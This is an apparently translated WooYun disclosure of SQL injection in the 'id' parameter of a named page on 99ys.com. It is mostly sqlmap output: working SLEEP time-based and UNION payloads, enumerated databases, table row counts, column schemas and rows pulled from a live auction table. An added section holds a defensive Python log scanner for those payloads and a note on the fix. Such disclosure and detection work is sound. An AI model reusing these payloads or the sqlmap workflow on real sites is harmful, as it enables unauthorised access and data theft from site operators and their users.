Vulnerability summary

Defect ID: wooyun-2016-0173488

Title: SQL injection on a 99艺术网 (99ys.com) subsite leaks a large amount of user and auction transaction data

Vendor: 99艺术网

Author: 路人甲

Submitted: 2016-01-31 08:59

Fix date: 2016-03-14 15:10

Published: 2016-03-14 15:10

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: vendor could not be reached, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2016-01-31: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed to the public
2016-03-14: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

As stated in the title.

Detailed description:

http://magazine.99ys.com/hdbox.php?id=5285&page=1


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=5285 AND (SELECT * FROM (SELECT(SLEEP(5)))ALAJ)&page=1
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-6546 UNION ALL SELECT NULL,CONCAT(0x717a787071,0x4b457a4c646c78426d4d,0x7170626a71),NULL-- &page=1
---
[23:13:50] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.16, PHP 5.5.27
back-end DBMS: MySQL 5.0.12
[23:13:50] [INFO] fetching database names
[23:13:50] [INFO] the SQL query used returns 4 entries
[23:13:50] [INFO] resumed: information_schema
[23:13:50] [INFO] resumed: 99yss
[23:13:50] [INFO] resumed: cacti
[23:13:50] [INFO] resumed: test
available databases [4]:
[*] 99yss
[*] cacti
[*] information_schema
[*] test
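As an added example (not part of the original report), the following Python script scans constructed Apache-style access-log lines for the two payload shapes sqlmap reported against hdbox.php?id=: a SLEEP() time-based blind probe and a UNION SELECT extraction, plus any other non-integer value in a parameter the application treats as a number. The log lines, client IPs and the assumption that id and page are integer parameters are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style access-log lines (not from the report). The first two
# carry the two payload shapes sqlmap reported for hdbox.php?id=, the third is benign.
SAMPLE_LOG = """\
203.0.113.7 - - [30/Jan/2016:23:13:50 +0800] "GET /hdbox.php?id=5285%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))ALAJ)&page=1 HTTP/1.1" 200 4120
203.0.113.7 - - [30/Jan/2016:23:13:51 +0800] "GET /hdbox.php?id=-6546%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x717a787071,0x4b457a4c646c78426d4d,0x7170626a71),NULL--%20&page=1 HTTP/1.1" 200 3980
198.51.100.9 - - [30/Jan/2016:23:14:02 +0800] "GET /hdbox.php?id=5285&page=1 HTTP/1.1" 200 4120
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
TIME_BASED_RE = re.compile(r'\b(?:SLEEP|BENCHMARK)\s*\(', re.I)   # time-based blind probe
UNION_RE = re.compile(r'\bUNION\b(?:\s+ALL)?\s+SELECT\b', re.I)   # UNION-query extraction
INT_PARAMS = ("id", "page")  # assumption: hdbox.php treats these as integers

def check_line(line):
    """Return a finding for a request whose integer parameter is not a plain integer, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes the values
    for name in INT_PARAMS:
        for value in params.get(name, []):
            if re.fullmatch(r"-?\d+", value):
                continue  # well-formed integer, nothing to report
            if TIME_BASED_RE.search(value):
                kind = "time-based blind"
            elif UNION_RE.search(value):
                kind = "union query"
            else:
                kind = "non-integer"
            return {"path": url.path, "param": name, "kind": kind, "value": value}
    return None

def scan(log_text):
    """Run check_line over every line and collect the findings in order."""
    return [f for f in map(check_line, log_text.splitlines()) if f]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['path']} {f['param']}={f['value']!r}: {f['kind']}")
```

The same integer check, applied server-side before the value reaches the query (or a prepared statement with a bound integer parameter), is what closes the hole the report demonstrates.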

Proof of vulnerability:

Database: 99yss
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| `99art_news_tags` | 664044 |
| `99art_auction_work` | 560280 |
| `99_auction_work` | 537135 |
| `99art_auction_work22` | 537049 |
| vert_auction_work | 516396 |
| `99_news_tags` | 433854 |
| `99art_news_attribute` | 335335 |
| `99art_news_images` | 307909 |
| `99_news_attribute` | 177772 |
| `99_news_images` | 175267 |
| `99art_news_hit` | 160863 |
| `99art_news_category` | 157557 |
| `99art_news` | 157555 |
| `99art_news_tags_fulltext` | 157469 |
| vert_images | 142531 |
| `99art_exhibit_works` | 132675 |
| vert_mall_comment | 128561 |
| `99_news_title` | 93424 |
| `99_news_hit` | 93361 |
| `99_news` | 92598 |
| `99_news_content` | 91453 |
| vert_exhibit_works | 81357 |
| `99user_work` | 75608 |
| `99_works` | 69408 |
| `99art_exhibit_works1` | 65127 |
| `99_exhibit_works` | 65104 |
| vert_cha_works | 55567 |
| `99_artist_works` | 40222 |
| `99user_category` | 25058 |
| `99special_zan_ip` | 22692 |
| vert_gal_exhibit | 18396 |
| `99art_news_mechanism` | 17072 |
| `99art_exhibit` | 14523 |
| vert_index_history | 13838 |
| `99user_news` | 11648 |
| `99art_news_people` | 11011 |
| `99art_auction_special` | 10221 |
| vert_index_history_old | 9683 |
| `99art_index_history` | 9670 |
| `99user_message` | 8967 |
| vert_comment | 8613 |
| vert_en_comment | 8338 |
| vert_exhibit | 8071 |
| `99app_push` | 7396 |
| `99art_exhibit1` | 6454 |
| `99_exhibit` | 6436 |
| vert_cha_article | 6205 |
| `99user_photo` | 5736 |
| vert_publish_content | 5360 |
| `99_recommend_history` | 5205 |
| `99art_live_images` | 5166 |
| `99user_tags` | 4778 |
| `99art_ad_hit_new` | 4508 |
| `99user_work_album` | 4315 |
| `99art_comment` | 4238 |
| live_images | 4178 |
| vert_gal_works | 3982 |
| `99user_photo_album` | 3772 |
| `99art_index_shhistory` | 3732 |
| `99user_hit` | 3572 |
| `99user_modul` | 3568 |
| `99user_artist_intro` | 3539 |
| `99user_users` | 3421 |
| `99art_index_cdhistory` | 3330 |
| `99_auction_special` | 3286 |
| `99art_auction_address` | 2761 |
| `99art_auction` | 2657 |
| `99art_area` | 2469 |
| vert_area | 2465 |
| vert_auction_special | 2460 |
| vert_cha_artist | 2425 |
| vert_gal_gallery | 2215 |
| vert_tags | 2147 |
| `99app_special_sub` | 2026 |
| `99art_comment_floor` | 1999 |
| `99_feature_index` | 1923 |
| `99_artist` | 1906 |
| `99user_yearbook` | 1836 |
| vert_en_news | 1823 |
| `99art_exhibit_do` | 1803 |
| `99art_auction_work1` | 1555 |
| `99_mechanism` | 1532 |
| `99_mechanism_bak` | 1479 |
| `99art_news_exhibit` | 1469 |
| vert_exhibit_news | 1456 |
| `99_feature_import` | 1433 |
| `99art_index` | 1369 |
| `99art_auction_hit` | 1342 |
| `99_exhibit_news22` | 1317 |
| `99art_live_comment` | 1265 |
| `99app_headlines` | 1261 |
| `99_exhibit_news` | 1242 |
| live_comment | 1239 |
| `99art_index_newhistory` | 1216 |
| vert_publish_list | 1118 |
| vert_del | 1085 |
| `99app_collecting` | 1028 |
| `99_auction_work1` | 1019 |
| vert_index | 946 |
| vert_en_works | 921 |
| `99app_imglook` | 882 |
| `99_comment` | 867 |
| vert_artist | 852 |
| notepreg | 835 |
| `99_news_recycling` | 819 |
| fail_record | 694 |
| gather_info | 659 |
| vert_gallery | 657 |
| vert_en_exhibition | 608 |
| vert_auction | 587 |
| vert_cha_works_artist | 500 |
| vert_auction_icfbse | 491 |
| operate | 425 |
| vert_mall_goods | 394 |
| vert_auction_agencies | 361 |
| vert_deet | 344 |
| `99user_comment` | 309 |
| `99special_comment` | 293 |
| `99special_article` | 245 |
| `99art_index_modul` | 204 |
| `99special_zan` | 199 |
| `99art_index_modul20131103` | 190 |
| `99art_ad_new` | 174 |
| vert_publish_name | 170 |
| vert_index_modul | 164 |
| `99user_artist_link` | 163 |
| source | 161 |
| `99_index_modul` | 156 |
| `99app_feedback` | 134 |
| `99art_ad_column_new` | 128 |
| `99_recommend` | 117 |
| `99art_column` | 115 |
| `99art_live` | 112 |
| source_mol | 108 |
| `99app_focusimg` | 106 |
| `99art_live_exhibit` | 106 |
| vert_ad | 102 |
| vert_link | 100 |
| vert_en_index | 92 |
| live | 91 |
| live_exhibit | 87 |
| vert_special_comment | 87 |
| vert_category | 79 |
| vert_gal_publish | 78 |
| vert_event | 77 |
| vert_email | 72 |
| vert_cha_series | 69 |
| `99art_exhibit_charge` | 55 |
| `99_column` | 50 |
| `99app_special` | 46 |
| `99special_author` | 46 |
| vert_en_artist | 45 |
| vert_special_viewpoint | 44 |
| vert_focus_picture | 38 |
| `99art_ad` | 35 |
| `99_feature_module` | 34 |
| user_session_id | 30 |
| vert_live_comment | 27 |
| vert_admin | 26 |
| vert_en_link | 26 |
| `99_index` | 23 |
| `99_attribute` | 21 |
| `99_exhibit_target` | 19 |
| `99art_exhibit_target` | 19 |
| vert_exhibit_target | 19 |
| `99_relative` | 18 |
| vert_synopsis | 18 |
| `99app_search_key` | 17 |
| `99_community` | 16 |
| `99art_ad_news` | 16 |
| vert_cha_community | 16 |
| vert_en_category | 16 |
| `99_artist_category` | 15 |
| `99user_media` | 15 |
| vert_cha_category | 15 |
| `99_feature` | 14 |
| `99_recommend_position` | 14 |
| vert_en_ad | 14 |
| vert_live_images | 14 |
| `99user_cover` | 12 |
| vert_en_link_category | 11 |
| vert_link_category | 11 |
| security | 9 |
| `99art_ad_column` | 8 |
| vert_live_related | 8 |
| vert_special_subject | 8 |
| `99_ad_column` | 7 |
| `99_auction_attribute` | 6 |
| `99_exhibit_category` | 6 |
| `99_mechanism_category` | 6 |
| `99art_auction_attribute` | 6 |
| `99art_exhibit_category` | 6 |
| vert_auction_category | 6 |
| vert_en_modul | 6 |
| vert_exhibit_category | 6 |
| `99_artist_class` | 5 |
| `99user_class` | 5 |
| `99user_sys_category` | 5 |
| vert_cha_class | 5 |
| vert_gal_category | 5 |
| `99art_position_web` | 4 |
| `99ceshi` | 3 |
| `99_works_category` | 2 |
| `99special_image` | 2 |
| vert_mall_news | 2 |
| vert_organ | 2 |
| `99app_about` | 1 |
| `99app_ad` | 1 |
| vert_search_key | 1 |
+-----------------------------+---------+


Database: 99yss
Table: 99art_auction_work
[38 columns]
+---------------+--------------+
| Column | Type |
+---------------+--------------+
| order | smallint(6) |
| size | varchar(50) |
| year | varchar(50) |
| admin | varchar(50) |
| aid | int(11) |
| auc_name | varchar(50) |
| auc_time | int(11) |
| author | varchar(50) |
| author_id | int(11) |
| author_intro | text |
| author_year | varchar(100) |
| cat_num | varchar(20) |
| company | varchar(50) |
| content | text |
| deal_val_eur | varchar(50) |
| deal_val_hkd | varchar(50) |
| deal_val_rmb | varchar(50) |
| deal_val_usd | varchar(50) |
| est_max | varchar(50) |
| est_min | varchar(50) |
| est_type | smallint(6) |
| id | int(11) |
| materials | varchar(50) |
| mid | int(11) |
| money_prefix | char(4) |
| mtype | smallint(6) |
| other | text |
| pub_time | int(11) |
| sid | int(11) |
| specail_name | varchar(100) |
| src | varchar(30) |
| statement | varchar(255) |
| type | varchar(50) |
| valuation_eur | varchar(50) |
| valuation_hkd | varchar(50) |
| valuation_usd | varchar(50) |
| valuations | varchar(50) |
| work_name | varchar(150) |
+---------------+--------------+


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=5285 AND (SELECT * FROM (SELECT(SLEEP(5)))ALAJ)&page=1
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-6546 UNION ALL SELECT NULL,CONCAT(0x717a787071,0x4b457a4c646c78426d4d,0x7170626a71),NULL-- &page=1
---
[23:15:38] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.16, PHP 5.5.27
back-end DBMS: MySQL 5.0.12
Database: 99yss
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| `99art_auction_work` | 560280 |
+----------------------+---------+
[23:15:38] [INFO] fetching columns 'admin, auc_name, author, author_id, cat_num, work_name' for table '99art_auction_work' in database '99yss'
[23:15:38] [INFO] the SQL query used returns 6 entries
[23:15:38] [INFO] resumed: "auc_name","varchar(50)"
[23:15:38] [INFO] resumed: "cat_num","varchar(20)"
[23:15:38] [INFO] resumed: "work_name","varchar(150)"
[23:15:38] [INFO] resumed: "author","varchar(50)"
[23:15:38] [INFO] resumed: "admin","varchar(50)"
[23:15:38] [INFO] resumed: "author_id","int(11)"
[23:15:38] [INFO] fetching entries of column(s) 'admin, auc_name, author, author_id, cat_num, work_name' for table '99art_auction_work' in database '99yss'
[23:15:38] [INFO] the SQL query used returns 560280 entries
[23:15:39] [WARNING] reflective value(s) found and filtering out
[23:15:39] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","王雪涛","0","0054","瓶花图"
[23:15:39] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","王雪涛","0","0055","草虫花卉"
[23:15:39] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","齐白石","0","0056","葡萄"
[23:15:39] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","白雪石","0","0057","漓江春晓"
[23:15:39] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","白雪石","0","0058","春风漓水"
[23:15:40] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","方济众","0","0059","岩畔"
[23:15:40] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","王雪涛","0","0060","凌霄八哥"
[23:15:40] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","李苦禅","0","0061","松鹰图"
[23:15:40] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","许麐庐 黄胄","0","0062","古乐...
[23:15:40] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","孙其峰","0","0063","林间春晚"
[23:15:40] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","孙其峰","0","0064","水滨"
[23:15:41] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","郭味蕖","0","0065","茶花"
[23:15:41] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","郭味蕖","0","0066","墨梅图"
[23:15:41] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","亚明 于希宁","0","0067","明珠璀灿"
[23:15:41] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","张辛国","0","0068","大吉图"
[23:15:41] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","吕林","0","0069","熊猫"
[23:15:42] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","张正宇","0","0070","熊猫"
[23:15:42] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","张正宇","0","0071","熊猫"
[23:15:42] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","黄永玉","0","0072","大解脱"
[23:15:42] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","王子武","0","0073","曹雪芹小像"
[23:15:43] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","叶浅予","0","0074","藏族舞者"
[23:15:43] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","刘汉","0","0075","奔月图"
[23:15:43] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","林锴","0","0076","酩酊夜归图"
[23:15:43] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","齐燕铭","0","0077","篆书"
[23:15:43] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","何海霞","0","0078","行书五言诗"
[23:15:43] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","吴作人","0","0079","行书"
[23:15:44] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","吴作人","0","0080","行书"
[23:15:44] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","李苦禅","0","0081","章草七言诗"
[23:15:44] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","董寿平","0","0082","草书毛主席词"
[23:15:44] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","启功","0","0083","草书五言诗"


Database: 99yss
Table: 99art_auction_work22
[38 columns]
+---------------+--------------+
| Column | Type |
+---------------+--------------+
| order | smallint(6) |
| size | varchar(50) |
| year | varchar(50) |
| admin | varchar(50) |
| aid | int(11) |
| auc_name | varchar(50) |
| auc_time | int(11) |
| author | varchar(50) |
| author_id | int(11) |
| author_intro | text |
| author_year | varchar(100) |
| cat_num | varchar(20) |
| company | varchar(50) |
| content | text |
| deal_val_eur | varchar(50) |
| deal_val_hkd | varchar(50) |
| deal_val_rmb | varchar(50) |
| deal_val_usd | varchar(50) |
| est_max | varchar(50) |
| est_min | varchar(50) |
| est_type | smallint(6) |
| id | int(11) |
| materials | varchar(50) |
| mid | int(11) |
| money_prefix | char(4) |
| mtype | smallint(6) |
| other | text |
| pub_time | int(11) |
| sid | int(11) |
| specail_name | varchar(100) |
| src | varchar(30) |
| statement | varchar(255) |
| type | varchar(50) |
| valuation_eur | varchar(50) |
| valuation_hkd | varchar(50) |
| valuation_usd | varchar(50) |
| valuations | varchar(50) |
| work_name | varchar(150) |
+---------------+--------------+


Database: 99yss
Table: 99_auction_work
[34 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| order | smallint(6) |
| size | varchar(50) |
| year | varchar(50) |
| admin | varchar(50) |
| aid | int(11) |
| auc_company | varchar(50) |
| auc_name | varchar(50) |
| auc_time | int(11) |
| author | varchar(50) |
| author_intro | text |
| author_year | varchar(100) |
| cat_num | varchar(20) |
| content | text |
| deal_val_eur | varchar(50) |
| deal_val_hkd | varchar(50) |
| deal_val_rmb | varchar(50) |
| deal_val_usd | varchar(50) |
| est_max | varchar(50) |
| est_min | varchar(50) |
| est_type | smallint(6) |
| gal_id | int(11) |
| id | int(11) |
| materials | varchar(50) |
| money_prefix | char(4) |
| mtype | smallint(6) |
| other | text |
| pub_time | int(11) |
| sid | int(11) |
| specail_name | varchar(100) |
| src | varchar(30) |
| statement | varchar(255) |
| type | varchar(50) |
| valuations | varchar(50) |
| work_name | varchar(150) |
+--------------+--------------+


Fix recommendation:

Copyright notice: when reposting, please credit the source as 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

The vendor could not be reached, or the vendor actively refused the report

Vulnerability rank: 15 (WooYun rating)